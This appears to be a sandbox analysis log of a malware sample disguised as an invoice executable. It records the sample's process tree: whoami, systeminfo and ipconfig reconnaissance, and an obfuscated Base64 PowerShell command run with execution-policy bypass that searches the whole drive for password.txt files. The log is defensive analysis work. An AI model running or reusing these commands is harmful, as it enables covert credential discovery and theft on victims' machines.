Source: powershell.exe, 00000007.00000002.1792905959.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.1794542433.0000000007914000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/i |
Source: powershell.exe, 00000007.00000002.1791417061.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000007.00000002.1791417061.0000000004D51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000007.00000002.1791417061.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: UCD_Invoice.exe, 00000000.00000002.2874189019.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.evilcorp.com |
Source: powershell.exe, 00000007.00000002.1791417061.0000000004D51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000007.00000002.1792905959.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.1792905959.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.1792905959.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000007.00000002.1791417061.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000007.00000002.1792905959.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: UCD_Invoice.exe, 00000000.00000003.2229249718.0000000001023000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000003.2229492381.000000000102C000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000003.2229091259.0000000001022000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000002.2874107556.0000000000CFD000.00000004.00000010.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000002.2874400410.000000000102D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.iana.org/domains/example |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082417A |
0_2_0082417A |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082443B |
0_2_0082443B |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082473B |
0_2_0082473B |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00824A4E |
0_2_00824A4E |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00824D4E |
0_2_00824D4E |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_008450E4 |
0_2_008450E4 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082504E |
0_2_0082504E |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00825361 |
0_2_00825361 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00859BB6 |
0_2_00859BB6 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_008563AB |
0_2_008563AB |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00856517 |
0_2_00856517 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0084E880 |
0_2_0084E880 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0084EEF0 |
0_2_0084EEF0 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00823391 |
0_2_00823391 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0084F420 |
0_2_0084F420 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00823652 |
0_2_00823652 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00823925 |
0_2_00823925 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00823BE6 |
0_2_00823BE6 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0084FC8B |
0_2_0084FC8B |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00857DDC |
0_2_00857DDC |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00823EA7 |
0_2_00823EA7 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0080BF0D |
0_2_0080BF0D |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: webio.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\whoami.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\whoami.exe |
Section loaded: authz.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\whoami.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\whoami.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\whoami.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: fastprox.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: ncobjapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Section loaded: esscli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\ipconfig.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\ipconfig.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\ipconfig.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\ipconfig.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\ipconfig.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\UCD_Invoice.exe "C:\Users\user\Desktop\UCD_Invoice.exe" |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\whoami.exe whoami |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo |
|
Source: C:\Windows\SysWOW64\systeminfo.exe |
Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\whoami.exe whoami |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
Jump to behavior |
Source: C:\Windows\SysWOW64\systeminfo.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: powershell.exe, 00000007.00000002.1791417061.0000000005416000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $^qyC:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\fd |
Source: powershell.exe, 00000007.00000002.1791417061.0000000005416000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\password.txt35_10.0.19041.1265_es-mx_09923a3484368fb6 |
Source: UCD_Invoice.exe, 00000000.00000003.2229450691.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWp |
Source: UCD_Invoice.exe, 00000000.00000003.2229249718.0000000001023000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000003.2229492381.000000000102C000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000003.2229091259.0000000001022000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000002.2874400410.000000000102D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: UCD_Invoice.exe, 00000000.00000003.2229124458.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, UCD_Invoice.exe, 00000000.00000002.2874267201.0000000001000000.00000004.00000020.00020000.00000000.sdmp, ucd_info.svg.0.dr |
Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No |
Source: powershell.exe, 00000007.00000002.1791417061.0000000005416000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $^qawow64_microsoft-windows-ime-korean-tipprofile_31bf3856ad364e35_10.0.19041.1_none_52130437b1eb7445.746_none_ac5c820a398ca985\r\password.txtS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082EAF5 mov ecx, dword ptr fs:[00000030h] |
0_2_0082EAF5 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0082EA47 mov eax, dword ptr fs:[00000030h] |
0_2_0082EA47 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EBA9 mov eax, dword ptr fs:[00000030h] |
0_2_0083EBA9 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EBFF mov eax, dword ptr fs:[00000030h] |
0_2_0083EBFF |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EB53 mov eax, dword ptr fs:[00000030h] |
0_2_0083EB53 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EC73 mov eax, dword ptr fs:[00000030h] |
0_2_0083EC73 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EDC0 mov eax, dword ptr fs:[00000030h] |
0_2_0083EDC0 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083ED69 mov eax, dword ptr fs:[00000030h] |
0_2_0083ED69 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_0083EE17 mov eax, dword ptr fs:[00000030h] |
0_2_0083EE17 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
